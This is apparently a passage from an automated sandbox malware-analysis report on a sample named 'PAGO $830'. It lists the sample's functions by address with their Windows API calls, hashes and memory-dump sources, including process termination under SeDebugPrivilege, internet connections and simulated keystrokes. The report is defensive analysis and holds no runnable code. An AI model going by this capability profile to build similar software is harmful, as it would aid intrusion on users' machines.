                                                          • Instruction ID: 0ed621ff9475e62652bb8e434ba87f24e63d47a49523b543920fae3803663b0e
                                                          • Opcode Fuzzy Hash: 1314fd2abaab4bd8c72560234d969d7aface4646d7690403b7ca4bcab674a529
                                                          • Instruction Fuzzy Hash: 97216F3290031AAFCF11AF90CC4AEEE7B35FF14700F048456F559660A2EA729558DB71
                                                          Function 00DA8CE5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e79b91a15f85091d5dbb36a53c06d5284cb16689fd32c4e9456f46a2ec02406d
                                                          • Instruction ID: fcd666cc0695e7dc1f1eeea45097792faa77dbed18a2e06d5330d1154cb85e93
                                                          • Opcode Fuzzy Hash: e79b91a15f85091d5dbb36a53c06d5284cb16689fd32c4e9456f46a2ec02406d
                                                          • Instruction Fuzzy Hash: 53C10474A04246AFCF11DFA9C840BADBBB1AF1B310F1841A9F954E7392CB348945DB74
                                                          Function 00D776AA Relevance: 13.8, APIs: 9, Instructions: 291COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetClientRect.USER32(?,?), ref: 00D776D0
                                                          • GetWindowRect.USER32(?,?), ref: 00D77711
                                                          • ScreenToClient.USER32(?,?), ref: 00D77739
                                                          • GetClientRect.USER32(?,?), ref: 00D7787D
                                                          • GetWindowRect.USER32(?,?), ref: 00D7789E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Rect$Client$Window$Screen
                                                          • String ID:
                                                          • API String ID: 1296646539-0
                                                          • Opcode ID: 01196586529449604f7411313436a819e107c03e5c54a67535cdbbdb77c35257
                                                          • Instruction ID: 5c57314004d42b8ec8f90d67dbdfe42b8eb7719dd5e9743191ce51eed85ebe05
                                                          • Opcode Fuzzy Hash: 01196586529449604f7411313436a819e107c03e5c54a67535cdbbdb77c35257
                                                          • Instruction Fuzzy Hash: 05C16D7990464AEFDB10CFA9C444BEDB7F1FF08310F18851AE89AA3254E734A991DB61
                                                          Function 00DACE30 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                          • String ID:
                                                          • API String ID: 1282221369-0
                                                          • Opcode ID: c62d90df102d84464efcd513aefdd405e059a6b0950f27ff9fe375c2a6c6ffa5
                                                          • Instruction ID: 7b3a0423aa6327a07f5d1fa5fdc8138ecaac8aea018a7849dd90a47b2751a266
                                                          • Opcode Fuzzy Hash: c62d90df102d84464efcd513aefdd405e059a6b0950f27ff9fe375c2a6c6ffa5
                                                          • Instruction Fuzzy Hash: 9F612672E04305AFDF21AFB9988167A7BA4EF03730F08416EF955E7281E6319E4587B1
                                                          Function 00D8A07B Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00DC72E3
                                                          • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00DC72FC
                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00DC730C
                                                          • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00DC7324
                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00DC7345
                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00D8A05E,00000000,00000000,00000000,000000FF,00000000), ref: 00DC7354
                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00DC7371
                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00D8A05E,00000000,00000000,00000000,000000FF,00000000), ref: 00DC7380
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                          • String ID:
                                                          • API String ID: 1268354404-0
                                                          • Opcode ID: 15471342e5dc06ec5646cec8dff221e743947bc531c8b8dabcca5e2afb75609b
                                                          • Instruction ID: 971fbe58a76bf279cec6ae630c0bb6b6a750f60bfd8df7a8383805600b8a2c6e
                                                          • Opcode Fuzzy Hash: 15471342e5dc06ec5646cec8dff221e743947bc531c8b8dabcca5e2afb75609b
                                                          • Instruction Fuzzy Hash: D3519B30600305AFEB20DF69CC45FAA77B5FB48750F244619F952A72E0D771E990DB61
                                                          Function 00DEC061 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DEC0A0
                                                          • GetLastError.KERNEL32 ref: 00DEC0B3
                                                          • SetEvent.KERNEL32(?), ref: 00DEC0C7
                                                            • Part of subcall function 00DEC171: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DEC190
                                                            • Part of subcall function 00DEC171: GetLastError.KERNEL32 ref: 00DEC240
                                                            • Part of subcall function 00DEC171: SetEvent.KERNEL32(?), ref: 00DEC254
                                                            • Part of subcall function 00DEC171: InternetCloseHandle.WININET(00000000), ref: 00DEC25F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                          • String ID:
                                                          • API String ID: 337547030-0
                                                          • Opcode ID: fc86d1edaaf4664375480b9c4cf36d6a15b8e8633b6d4af0acb65316baea09a0
                                                          • Instruction ID: 5551dc2003b601c02498113b3abff4063e2c4ec86ba6fc7320808fef017deda6
                                                          • Opcode Fuzzy Hash: fc86d1edaaf4664375480b9c4cf36d6a15b8e8633b6d4af0acb65316baea09a0
                                                          • Instruction Fuzzy Hash: F831AE71210745AFDB21AFB6CC44AABBBF8FF08700B18551EF95A92611C731E856DBB0
                                                          Function 00DD24E6 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00DD3985: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD399F
                                                            • Part of subcall function 00DD3985: GetCurrentThreadId.KERNEL32 ref: 00DD39A6
                                                            • Part of subcall function 00DD3985: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DD24F7), ref: 00DD39AD
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00DD2501
                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00DD251F
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00DD2523
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00DD252D
                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00DD2545
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00DD2549
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00DD2553
                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00DD2567
                                                          • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00DD256B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                          • String ID:
                                                          • API String ID: 2014098862-0
                                                          • Opcode ID: 9260edcd8bd96b930d17f21087a32df45e6988b7b93f6a92ccd575a915c685bb
                                                          • Instruction ID: fa391acd2b8653364d838fa52e19e43b9450a628887b1fc94ad1dde88362225d
                                                          • Opcode Fuzzy Hash: 9260edcd8bd96b930d17f21087a32df45e6988b7b93f6a92ccd575a915c685bb
                                                          • Instruction Fuzzy Hash: 7201D8303902147BFB2067699C8AF557F69DB8EB12F200106F314BF1D1C9E35488CABA
                                                          Function 00DD1747 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00DD138D,?,?,00000000), ref: 00DD1750
                                                          • HeapAlloc.KERNEL32(00000000,?,00DD138D,?,?,00000000), ref: 00DD1757
                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00DD138D,?,?,00000000), ref: 00DD176C
                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00DD138D,?,?,00000000), ref: 00DD1774
                                                          • DuplicateHandle.KERNEL32(00000000,?,00DD138D,?,?,00000000), ref: 00DD1777
                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00DD138D,?,?,00000000), ref: 00DD1787
                                                          • GetCurrentProcess.KERNEL32(00DD138D,00000000,?,00DD138D,?,?,00000000), ref: 00DD178F
                                                          • DuplicateHandle.KERNEL32(00000000,?,00DD138D,?,?,00000000), ref: 00DD1792
                                                          • CreateThread.KERNEL32(00000000,00000000,00DD17B8,00000000,00000000,00000000), ref: 00DD17AC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                          • String ID:
                                                          • API String ID: 1957940570-0
                                                          • Opcode ID: c7cdb56c859990a646e4cdd9a6b5f9fd6e53925473a88ffe7c297b2d76addbdd
                                                          • Instruction ID: 73c83d573c4904bc38d98b78858532c88d1863f68eec938169ac39b3853f2484
                                                          • Opcode Fuzzy Hash: c7cdb56c859990a646e4cdd9a6b5f9fd6e53925473a88ffe7c297b2d76addbdd
                                                          • Instruction Fuzzy Hash: CF01BF75241304BFE710AB65DC4DF677BACEB89711F104511FA05DB1A2C6759844CB60
                                                          Function 00DF444A Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 262COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit
                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$p
                                                          • API String ID: 2610073882-3481103671
                                                          • Opcode ID: 8b5e07207f40b2483526114e0ab3795e37f9c8de86ff1e2e5b859ab1381ea615
                                                          • Instruction ID: 75909d56e47f4d445e1157390f5738c5aadfa89ca4a4a82c08b6d2c088925d61
                                                          • Opcode Fuzzy Hash: 8b5e07207f40b2483526114e0ab3795e37f9c8de86ff1e2e5b859ab1381ea615
                                                          • Instruction Fuzzy Hash: C1918971A00219ABDF20DFA5C848FEFBBB8EF86714F158559E615AB280D7709944CFB0
                                                          Function 00DABAC7 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 171timeCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00E13720), ref: 00DABB31
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00E4121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00DABBA9
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00E41270,000000FF,?,0000003F,00000000,?), ref: 00DABBD6
                                                          • _free.LIBCMT ref: 00DABB1F
                                                            • Part of subcall function 00DA2958: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD771,00000000,00000000,00000000,00000000,?,00DAD798,00000000,00000007,00000000,?,00DADB95,00000000), ref: 00DA296E
                                                            • Part of subcall function 00DA2958: GetLastError.KERNEL32(00000000,?,00DAD771,00000000,00000000,00000000,00000000,?,00DAD798,00000000,00000007,00000000,?,00DADB95,00000000,00000000), ref: 00DA2980
                                                          • _free.LIBCMT ref: 00DABCEB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                          • String ID: 7$ 7
                                                          • API String ID: 1286116820-2298233292
                                                          • Opcode ID: 159613405475dfe621b75e8addf012ed4e8e857726a32a5de0c4ed3b0904a475
                                                          • Instruction ID: fad606648a57a5d5016a5bfd0f732c4b57e8a494f35eb3956352d4397a5453ec
                                                          • Opcode Fuzzy Hash: 159613405475dfe621b75e8addf012ed4e8e857726a32a5de0c4ed3b0904a475
                                                          • Instruction Fuzzy Hash: E251B771900219AFCB10DF7A9C4196A7BB8EF43370F14429BE450E71A2EB709D869B74
                                                          Function 00DFA009 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00DDD3FA: CreateToolhelp32Snapshot.KERNEL32 ref: 00DDD41F
                                                            • Part of subcall function 00DDD3FA: Process32FirstW.KERNEL32(00000000,?), ref: 00DDD42D
                                                            • Part of subcall function 00DDD3FA: CloseHandle.KERNEL32(00000000), ref: 00DDD4FA
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DFA094
                                                          • GetLastError.KERNEL32 ref: 00DFA0A7
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DFA0DA
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00DFA18F
                                                          • GetLastError.KERNEL32(00000000), ref: 00DFA19A
                                                          • CloseHandle.KERNEL32(00000000), ref: 00DFA1EB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                          • String ID: SeDebugPrivilege
                                                          • API String ID: 2533919879-2896544425
                                                          • Opcode ID: d26f96c8a9ee8cfe8c64f0637c9d87c2a5e9dd6f5d93fc8908991c25ac3843a6
                                                          • Instruction ID: c7356d7b77b7bddac5c1952f41919c3350324de43bae01150700d946787adcf3
                                                          • Opcode Fuzzy Hash: d26f96c8a9ee8cfe8c64f0637c9d87c2a5e9dd6f5d93fc8908991c25ac3843a6
                                                          • Instruction Fuzzy Hash: 2C617F70208242AFD720DF19C494F25BBA0EF54318F1AC49CE56A4F7A2C776ED45CBA2
                                                          Function 00E037B9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E03858
                                                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00E0386D
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E03887
                                                          • _wcslen.LIBCMT ref: 00E038CC
                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00E038F9
                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E03927
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window_wcslen
                                                          • String ID: SysListView32
                                                          • API String ID: 2147712094-78025650
                                                          • Opcode ID: dbe365c340b3815498c187ccd3363ab4a632b3605f9fb0a26d1c7bef1aa1df47
                                                          • Instruction ID: c42d2be6b1b6a731361478858ecfdec0deda2f7f519064025e0bb5208c787541
                                                          • Opcode Fuzzy Hash: dbe365c340b3815498c187ccd3363ab4a632b3605f9fb0a26d1c7bef1aa1df47
                                                          • Instruction Fuzzy Hash: C841AE71A00319ABEB219F64CC49FEA7BA9FF08754F101166F948F72D1D7719A848BA0
                                                          Function 00DDBB7C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DDBC1B
                                                          • IsMenu.USER32(00000000), ref: 00DDBC3B
                                                          • CreatePopupMenu.USER32 ref: 00DDBC71
                                                          • GetMenuItemCount.USER32(013958F8), ref: 00DDBCC2
                                                          • InsertMenuItemW.USER32(013958F8,?,00000001,00000030), ref: 00DDBCEA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                          • String ID: 0$2
                                                          • API String ID: 93392585-3793063076
                                                          • Opcode ID: 2f737f08ae905b53852ed5115a09e83b7550bac50bb261fd960432845d8e30ac
                                                          • Instruction ID: b4de0aa82bb160b983338f78afff485406e29fadd4fbc3186c17fd9911da3a61
                                                          • Opcode Fuzzy Hash: 2f737f08ae905b53852ed5115a09e83b7550bac50bb261fd960432845d8e30ac
                                                          • Instruction Fuzzy Hash: B2517A70600209DBDF20CF79D984AAEBBE5FF44328F29421BE842A7391DB719944CB71
                                                          Function 00DDC792 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadIconW.USER32(00000000,00007F03), ref: 00DDC831
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: IconLoad
                                                          • String ID: blank$info$question$stop$warning
                                                          • API String ID: 2457776203-404129466
                                                          • Opcode ID: 40c0d5a98aeb238fd7daf36c424da2f93be7b26fd85bce7537a46b14ecd4d9ba
                                                          • Instruction ID: 43d2231a03052673e4a81640452653e5111e52ca72597aef4958ecf13a07ec77
                                                          • Opcode Fuzzy Hash: 40c0d5a98aeb238fd7daf36c424da2f93be7b26fd85bce7537a46b14ecd4d9ba
                                                          • Instruction Fuzzy Hash: 0011D531668307BAEB019B649C82DAA6BDCDF15364F60503FF901E6382EBA1A941D578
                                                          Function 00DDEC37 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$LocalTime
                                                          • String ID:
                                                          • API String ID: 952045576-0
                                                          • Opcode ID: 9f94d6356e2ac97fe6fd9b17c2a45f25a72800302a51fe2033189ededed04ad0
                                                          • Instruction ID: 8db67992dd594d09cf98a3adb8e659ab93656296f0c357d984e1789b0d72feb0
                                                          • Opcode Fuzzy Hash: 9f94d6356e2ac97fe6fd9b17c2a45f25a72800302a51fe2033189ededed04ad0
                                                          • Instruction Fuzzy Hash: 7F414CA5D1021465CF11FBF8884AACFB7A9EF05310F508467E518E3262FA34E655C3FA
                                                          Function 00D8EEF7 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00DCEEDF,00000004,00000000,00000000), ref: 00D8EF72
                                                          • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00DCEEDF,00000004,00000000,00000000), ref: 00DCF0EE
                                                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00DCEEDF,00000004,00000000,00000000), ref: 00DCF171
